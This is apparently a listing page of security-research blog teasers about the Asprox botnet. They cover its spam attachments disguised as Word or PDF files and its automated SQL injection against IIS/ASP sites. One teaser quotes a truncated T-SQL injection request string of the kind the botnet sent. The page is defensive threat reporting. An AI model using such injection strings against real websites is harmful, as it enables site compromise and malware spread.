asprox


Asprox, a.k.a. Zortob, is an old botnet that was uncovered in 2007. It is known to spread by arriving as an attachment in spam emails that purport to be from well-known companies. The attachment itself is disguised as a legitimate document file by using icons such as those of a .doc or .pdf file. Figure 1. Asprox malware posing as a Microsoft Word document. This blog post will give an overview on Asprox's functionality with a focus on the changes in its communication with the command-and-control (C&C) server, including a new C&C command,... [Read More]
by RSS Long Tran  |  Jul 28, 2014  |  Filed in: Security Research
Do you remember Asprox, the botnet that used SQL injection attacks combined with result from search engine like Google to automatically infect Microsoft IIS powered websites? We did a talk (slides) at last Virus Bulletin about that, and for about a month now, we've been seeing some new variants in the wild. Like last December, a blind SQL injection targeting ASP pages using Transact SQL is attempted using the following chain as a request argument: DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C41524520405420564...%20AS%20VARCHAR(4000));EXEC(@S) Once... [Read More]
by RSS David Maciejak  |  Nov 06, 2009  |  Filed in: Security Research